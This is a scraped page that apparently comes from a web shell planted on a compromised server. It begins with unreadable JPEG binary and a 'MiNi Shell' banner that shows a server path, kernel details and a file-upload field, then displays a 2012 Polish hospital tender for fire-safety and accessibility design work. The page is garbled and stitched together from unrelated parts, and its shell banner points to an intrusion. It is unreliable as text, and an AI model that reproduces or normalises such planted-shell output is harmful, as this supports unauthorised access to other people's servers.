JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120420/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120420/90867-N-2012.html

<p class="kh_header"><b>Warszawa: Wykonanie dokumentacji projektowo - kosztorysowej w zakresie dostosowania pawilonów Szpitala Wolskiego do obowiązujących przepisów technicznych i p. pożarowych  oraz pełnienie nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 90867 - 2012; data zamieszczenia: 20.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kasprzaka 17, 01-211 Warszawa, woj. mazowieckie, tel. 022 3894859, faks 022 3894922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolski.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo - kosztorysowej w zakresie dostosowania pawilonów Szpitala Wolskiego do obowiązujących przepisów technicznych i p. pożarowych  oraz pełnienie nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej w zakresie dostosowania pawilonów Szpitala Wolskiego ( Paw. nr 1,2 3, 5, 6, 7, 8, 11, 12  do obowiązujących przepisów technicznych i p. poż. wraz  z nadzorem autorskim.
.  KOD CPV: 
	 74.23.20. 00 - 2   usługi architektoniczne, inżynieryjne   i planowania.
3.3. Przedmiotem zamówienia jest:  Opracowanie  dokumentacji projektowo kosztorysowej w zakresie dostosowania  pawilonów Szpitala Wolskiego tj. Pawilonu  Nr  1,  2,  3,  5,  6,  7,  8, 11, 12   -  do  obowiązujących  przepisów technicznych i ochrony  p. pożarowej  oraz pełnienie nadzoru autorskiego nad realizacją  robót  wykonywanych  na  podstawie  opracowanej dokumentacji.                                                                
 Kod CPV    -    74.23.20. 00 - 2    usługi architektoniczne, inżynieryjne   i planowania.
    Opracowanie powinno obejmować w szczególności: 
   A) Dokumentację  projektową  budowlaną i wykonawczą   w tym:       
       1)  inwentaryzację  szczegółową  przedprojektową  wielobranżową 
      2)  koncepcję  rozwiązań  funkcjonalno -użytkowych 
      3)  projekt  architektoniczny
      4)  projekt  konstrukcyjny
      5)  projekt  instalacji sanitarnych i wentylacyjnych
      6)  projekt  instalacji elektrycznej i teletechnicznej
      7)  projekt  instalacji p. poż ( SSP)
      8)  specyfikacje techniczne wykonania i odbioru robót bud. ( dla każdego  projektu)
      9)  ewentualnie projekty uzupełniające  - wynikające z   przyjętych rozwiązań  technicznych   
  
  B)  Dokumentację kosztorysową :
     10)  kosztorysy inwestorskie  ( dla każdego z projektu)
     11)  przedmiary robót           ( dla każdego projektu)
     12)  zbiorcze zestawienie kosztów. 
 
 Dokumentacja  projektowo-kosztorysowa  powinna  uwzględniać  ;
I)  wymogi  przeciwpożarowe   które zostały określone  w  Ekspertyzie  Technicznej 
    dotyczącej Stanu Ochrony Pożarowej - (stanowiącej  Załącznik  nr 1 A  do  SIWZ )
    opracowanej przez Biuro  WXCA( autor    mgr inż. Waldemar Baranowicz  - 
    rzeczoznawca ds. zabezpieczeń przeciwpożarowych,  nr  upr.297-94  ) zatwierdzonej 
    przez Wydział Kontrolno- Rozpoznawczy Komendy  Wojewódzkiej Państwowej Straży 
    Pożarnej w  Warszawie  oraz Postanowienia  z dnia   07.04.2010r.  Mazowieckiego 
    Komendanta    Wojewódzkiej  Państwowej Straży Pożarnej  dla:  Pawilonu  Nr 1,  
    Pawilonu Nr 2,  Pawilonu Nr 3,  Pawilonu Nr 8.
     
     Zakres podstawowych prac  projektowych : 
     Pawilon nr 1 - zaprojektować podział budynku na strefy pożarowe ( piwnice, parter, I 
                              piętro,  poddasze)  zgodnie z Ekspertyzą wraz z zabezpieczeniem
                              p. pożarowym instalacji technicznych; 
                           - zaprojektować na drogach ewakuacyjnych oświetlenie ewakuacyjne o 
                              natężeniu 1,0 lux i czasie działania 2 godziny  ( piwnice, parter, 
                              poddasze,); 
                           -  zaprojektować instalację podłączenia pawilonu Nr 1  ( SSP) do zbiorczej 
                              centralki przeciwpożarowej wg lokalizacji ustalonej z użytkownikiem  
                           -  zaprojektować zabudowę wind i wyposażyć  je w urządzenia do
                              usuwania  dymu wg  Ekspertyzy;
                           -  uwzględnić w pracach projektowych inne wymagania budowlane ( m. in. 
                               rozwiązanie  projektowe kolizji instalacji wodno-kanalizacyjnej, tlenowej, 
                               teletechnicznej ,  energetycznej).   
     Pawilon nr 2 - zaprojektować podział budynku na strefy pożarowe ( piwnice, parter, I 
                              piętro,  poddasze) zgodnie z Ekspertyzą wraz z zabezpieczeniem 
                              p. pożarowym instalacji technicznych, elementów drewnianych klatki  
                              schodowej,  elementów drewnianych konstrukcji dachu;
                          -  zaprojektować na drogach ewakuacyjnych zastosować oświetlenie 
                              ewakuacyjne o  natężeniu 1,0 lux i  czasie działania 2 godziny; 
                           -  zaprojektować instalacje systemu sygnalizacji pożaru  (SSP) - ochrona 
                              całkowita;      
                           -  zaprojektować instalacje podłączenia pawilonu Nr 2  ( SSP) do zbiorczej 
                              centralki przeciwpożarowej wg lokalizacji ustalonej z użytkownikiem;  
                           -  zaprojektować   instalację hydrantową  zgodnie z  Ekspertyzą;
                           -  zaprojektować   oddymianie klatki schodowej;
                           -  uwzględnić w pracach projektowych inne wymagania budowlane; 
    Pawilon nr 3  - zaprojektować podział budynku na strefy pożarowe zgodnie 
                              z Ekspertyzą  wraz z zabezpieczeniem  p. pożarowym instalacji 
                              technicznych elementów drewnianych konstrukcji dachu;
                           -  zaprojektować na drogach ewakuacyjnych oświetlenie ewakuacyjne o 
                              natężeniu 1,0 lux i czasie działania 2 godziny;  
                           -  zaprojektować instalację podłączenia pawilonu Nr 3  ( SSP) do zbiorczej 
                              centralki przeciwpożarowej wg lokalizacji ustalonej z użytkownikiem  
                           - zaprojektować zabudowę windy i wyposażyć ją  w urządzenia do 
                             usuwania  dymu wg  Ekspertyzy;
                          -  zaprojektować instalacje systemu sygnalizacji pożaru  (SSP)- ochrona 
                             całkowita;
                          - uwzględnić w pracach projektowych inne wymagania budowlane; 
                          - zaprojektować   instalację hydrantową  zgodnie z  Ekspertyzą;
 Pawilon nr 8   - zaprojektować podział budynku na strefy pożarowe zgodnie z Ekspertyzą 
                            wraz z zabezpieczeniem  p. pożarowym instalacji technicznych
                            ( piwnice, część parteru,  II p.);  
                          - zaprojektować na drogach ewakuacyjnych oświetlenie ewakuacyjne o 
                        natężeniu 1,0 lux i czasie działania  2 godziny  (piwnice, część parteru, IIp.);  
                          - zaprojektować instalację podłączenia pawilonu Nr 8  ( SSP) do zbiorczej 
                            centralki przeciwpożarowej wg lokalizacji ustalonej z użytkownikiem  
                          - zaprojektować zabudowę wind i wyposażyć je  w urządzenia do usuwania  
                            dymu  wg  Ekspertyzy;
                          - zaprojektować instalacje systemu sygnalizacji pożaru  (SSP) - ochrona 
                            całkowita z inwentaryzacją prac wykonanych;
                          - uwzględnić w pracach projektowych inne wymagania budowlane; 

II -  wymogi techniczne  wynikające z  Rozporządzenia Ministra i  Infrastruktury w sprawie 
       warunków technicznych,  jakim powinny odpowiadać budynki i ich usytuowanie 
       (Dz. U .Nr 75 z 2002 r. poz.690). Zgodnie z paragrafem 54,55 ww   rozporządzenia  :  
       Pawilon  Nr 2,   Pawilon Nr 6,  Pawilon  Nr 8,   Pawilon Nr 11,  Pawilon Nr 12  -  
       są to obiekty użyteczności publicznej  które  należy dostosować dla   potrzeb osób 
       niepełnosprawnych ruchowo   ( korzystających zarówno z wózków  inwalidzkich jak i 
       poruszających się za pomocą innego rodzaju urządzeń rehabilitacyjnych)   w celu 
       zapewnienia dojazdu z  poziomu terenu  na parter budynku ( zapewnienie  możliwości  
       dostępu na  kondygnacje użytkowe. 
       Sposób rozwiązania technicznego dostępu do budynków  określi dokumentacja projektowa. 

III  - wymogów przeciwpożarowych  określonych  w  Ocenie  Technicznej  -  
        stanowiącej    Załącznik Nr 2A  do  SIWZ 
       opracowanej przez Biuro  WXCA  autor:  Waldemar  Baranowicz  - rzeczoznawca do 
       spraw  zabezpieczeń przeciwpożarowych , nr upr.297-94 dla: Pawilonu Nr 5,  Pawilonu 
       Nr 7, Pawilonu nr 12
       Zakres podstawowych  prac projektowych: 
       Pawilon nr 5 - zaprojektować podział budynku na strefy pożarowe zgodnie z Ekspertyzą  
                               wraz z zabezpieczeniem  p. pożarowym instalacji technicznych;                             
                             - zaprojektować na drogach ewakuacyjnych oświetlenie ewakuacyjne 
                               o natężeniu 1,0 lux i czasie działania 2 godziny;  
                            -  zaprojektować zabudowę windy i wyposażyć ją  w urządzenia do 
                               usuwania dymu wg  Ekspertyzy; 
                             - uwzględnić w pracach projektowych inne wymagania budowlane;
                             - zaprojektować   instalację hydrantową  zgodnie z  Ekspertyzą;
      Pawilon nr 7  - zaprojektować podział budynku na strefy pożarowe, zgodnie z Ekspertyzą  
                              wraz z zabezpieczeniem  p. pożarowym instalacji  technicznych;                            
                             - zaprojektować na drogach ewakuacyjnych oświetlenie ewakuacyjne o 
                               natężeniu 1,0 lux i czasie działania 2 godziny,  
                             - uwzględnić w pracach projektowych inne wymagania budowlane;
     Pawilon nr 12 - zaprojektować podział budynku na strefy pożarowe,  zgodnie  z          
                         Ekspertyzą   wraz z zabezpieczeniem  p. pożarowym instalacji technicznych;                             
                             -  zaprojektować na drogach ewakuacyjnych oświetlenie ewakuacyjne o 
                                natężeniu 1,0 lux i czasie działania 2 godziny;  
                             -  uwzględnić w pracach projektowych inne wymagania budowlane  
                                w tym projekt przebudowy klatki schodowej z parteru do piwnicy);  
                             - zaprojektować   instalację hydrantową  zgodnie z  Ekspertyzą;

 Dokumentację projektową, specyfikację techniczną wykonania i odbioru robót budowlanych oraz inne wymagane opracowania , należy wykonać zgodnie z:                                    1)  Rozporządzeniem Ministra  infrastruktury z dnia 2 września 2004 roku w sprawie 
     szczegółowego  zakresu i formy dokumentacji projektowej, specyfikacji technicznych    
     wykonania i odbioru  robót budowlanych oraz programu funkcjonalno-użytkowego                     
     ( Dz. U. Nr 202,poz.2072  ze zm.). 
2)  Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego 
     zakresu i formy projektu budowlanego Dz. U. Nr 120, poz.1133. 
3)  Rozporządzeniem   Ministra  Infrastruktury z dnia 23 czerwca 2003 roku w sprawie   
     informacji dotyczącej  bezpieczeństwa   i ochrony zdrowia oraz planu bezpieczeństwa    
   i  ochrony zdrowia    Dz. U. Nr 120 ,poz.1126. 
4)  Rozporządzeniem  Ministra Infrastruktury z   dnia 18 maja 2004 r. w sprawie określenia metod i podstaw   sporządzania  kosztorysu inwestorskiego, obliczania  planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-  użytkowym   (Dz. U. Nr 130 poz.1389.
5)  Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie 
     warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie                 
     Dz. U. nr 75 poz.690 ze zm..
6)  Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia  
     2006 r. w sprawie ochrony przeciwpożarowej  budynków, innych obiektów 
    budowlanych i terenów Dz. U. Nr 80 poz.563.
7)  Ustawą z dnia 7 lipca 1994 r. Prawo budowlane  Dz. U. z 2006 r. Nr 156  poz.1118   z późn. zm..
8)  Rozporządzeniem Ministra Zdrowia z dnia 2 lutego 2011 r. w  sprawie wymagań, 
     jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i 
     urządzenia   zakładu opieki zdrowotnej  Dz. U.  Nr 31 ,poz.158 .
9)  Obowiązującymi  w dacie przekazania  opracowania  przepisami  pozwalającymi na 
     uzyskanie pełnych uzgodnień i pozwolenia na budowę.  
 
Przedmiary robót  powinny uwzględniać wszystkie  niezbędne czynności wynikające z 
 konieczności zabezpieczenia prac oraz inne czynności nie  wynikające  bezpośrednio z 
 dokumentacji technicznej w wyżej wymienionym zakresie.  
 Dokumentacja projektowa i kosztorysowa winna  być sporządzona dla każdego  pawilonu oddzielnie. 

III   Nadzory autorskie  powinny być  wliczone w cenę ofertową. 
Pełnienie nadzoru autorskiego nad robotami budowlanymi wykonywanymi na podstawie      opracowanej dokumentacji sprawowane będzie zgodnie z art.20 ust.1 pkt.4 ustawy  Prawa     budowlanego i  m. in. obejmuje:
a)	nadzór nad zgodnością wykonawstwa z dokumentacją  projektową w zakresie rozwiązań  materiałowych, użytkowych ,technicznych i technologicznych;
b)	 wyjaśnianie wątpliwości dotyczących opracowanej dokumentacji projektowej  i zawartych niej rozwiązań tym uszczegółowienia rysunków wykonawczych ,nanoszenia poprawek;
c)	uzgadnianie z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji  projektowej, zgłoszonych przez kierownika budowy lub nadzór inwestorski;
d)	przedstawianie propozycji rozwiązań zamiennych, w przypadku niemożności zastosowania rozwiązań występujących w dokumentacji projektowej lub gdy ich zastosowanie jest nieekonomiczne w świetle aktualnej wiedzy i zasad sztuki budowlanej ,a koszt zastosowania nowych nie zwiększy zadania z zastrzeżeniem, że każde rozwiązanie musi być zaakceptowane przez Zamawiającego;
e)	poprawianie błędów projektowych, likwidację kolizji miedzy branżami lub uzupełnianie rysunków , bądź opisu technologii wykonania zawartych w dokumentacji-bez prawa do odrębnego wynagrodzenia;
f)	uczestnictwo w  koordynacjach technicznych  na wezwanie Zamawiającego. 
  
Uwaga: 
-  Część rzutów kondygnacji poszczególnych pawilonów przedstawiona w Załączniku Nr 1 do  
   SIWZ oraz  Załączniku Nr 2 do SIWZ - jest nieaktualna, ze względu na wykonane prace 
    budowlane w latach  2010 - 2011  w zakresie  przebudowy -modernizacji pomieszczeń.                                                                          
-  Zamawiający  informuje ,że  nie posiada dokumentacji architektoniczno-budowlanej  
   archiwalnej  dotyczącej   Pawilonu Nr 2,  Pawilonu nr 5, Pawilonu Nr 6, Pawilonu Nr 7,  
   Pawilonu Nr11, Pawilonu Nr 12.                                
   Na pozostałe pawilony  Zamawiający posiada dokumentację powykonawczą  wersja  papierowa w niepełnym zakresie.  
      
    Obowiązki Wykonawcy:
1.  Uzyskanie we własnym zakresie i na własny koszt  wszystkich niezbędnych danych 
     wyjściowych do projektowania w tym np.:  map   w tym też  mapy do celów 
     projektowych.
2.  Wykonanie opracowań, których opracowanie okaże się    konieczne do sporządzenia 
      kompletnej dokumentacji  np. złożenie wniosku i uzyskania  Decyzji  o ustaleniu 
      lokalizacji  inwestycji  celu publicznego. 
3.  Dokonanie uzgodnień międzybranżowych  jak również  wszystkich wymaganych     
     uzgodnień, w tym  m.in.  z rzeczoznawcami do  spraw   bezpieczeństwa i   higieny pracy, 
     zabezpieczeń   przeciwpożarowych ,  sanitarno-  higienicznych. 
4.  Uzyskanie wszelkich wymaganych przepisami prawa   opinii , wytycznych   np. od 
     Stołecznego Konserwatora Zabytków, jeżeli jest to niezbędne do   wykonania  
     opracowania.  
     Nadmieniamy, że zespół budowlany Szpitala Wolskiego teren + budynki ujęty jest  w wykazie zabytków  nieruchomych i podlega pod Stołecznego konserwatora Zabytków.
5.   Uzgodnienie z Zamawiającym  przed przystąpieniem do prac projektowych ,  zakresu 
      robót ujętych w opracowaniu.
6.   Projekty budowlano-wykonawcze muszą spełniać wymagania niezbędne do uzyskania   
      decyzji o pozwoleniu na budowę bądź zgłoszenia właściwemu organowi wykonania robót 
      budowlanych. 
      Każdy egzemplarz projektu we wszystkich branżach powinien być trwale oprawiony. 
7.   Dokumentację  Wykonawca złoży Zamawiającemu  w formie papierowej wydrukowanej 
      z   plików PDF w 5 egzemplarzach , specyfikacje techniczne,  kosztorysy   inwestorskie, 
      przedmiary robót -   należy wykonać w 3 egzemplarzach, ponadto  Wykonawca
      zobowiązany  jest dostarczyć    dokumentację  projektowo-kosztorysową w   wersji 
      elektronicznej  ogólnodostępnej  1 płytka  oraz  tylko do  odczytu  1 płytka. 
 8.  W zakres zamówienia wchodzi również dokonanie przez Wykonawcę wszelkich 
      poprawek uzupełnień, modyfikacji dokumentacji, których wykonanie będzie wymagane w 
      celu przyjęcia  dokumentacji przez instytucje dokonujące  ewentualnej oceny a także w 
      przypadku gdy konieczność wprowadzenia takich poprawek uzupełnień wystąpi po 
     przyjęciu przez  Zamawiającego  przedmiotu zamówienia i zapłacie za jego wykonanie. 
9.   Wykonawca zamówienia zobowiązany będzie przekazać bez dodatkowego 
      wynagrodzenia na rzecz Zamawiającego wszelkie prawa autorskie i majątkowe    
      wynikające z tytułu wykonanej dokumentacji.
10. Zamawiający wymaga, aby Wykonawca w dokumentacji projektowej oraz specyfikacji 
      technicznych wykonania i odbioru robót określił właściwości urządzeń i materiałów z 
      uwzględnieniem ar.29 ust.2 i 3 i zgodnie z wymaganiami art.30 ust.1-3 ustawy Prawo 
      zamówień publicznych z dnia 29.01.2004r tekst jednolity Dz. U .z 2007 r. nr 223 
     ,poz.1655 z późn. zm. .  Jeżeli wykonawca określi w dokumentacji projektowej lub 
      specyfikacji technicznej wykonania i odbioru robót właściwości urządzeń lub materiałów 
     za pomocą  znaku towarowego, patentu lub pochodzenia, zobowiązany będzie opisać w 
    tych opracowaniach rozwiązania równoważne w sposób umożliwiający przygotowanie 
    oferty na wykonanie robót budowlanych. 
 
    Zamawiający wymaga zapoznania się  z przedmiotem SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 7 Ustawy w przypadku wystąpienia okoliczności polegających na konieczności powtórzenia tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do postępowania zobowiązuje sie wnieść wadium 6.600,00 pln. ( sześć tysięcy sześćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunjków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunjków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunjków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunjków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunjków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

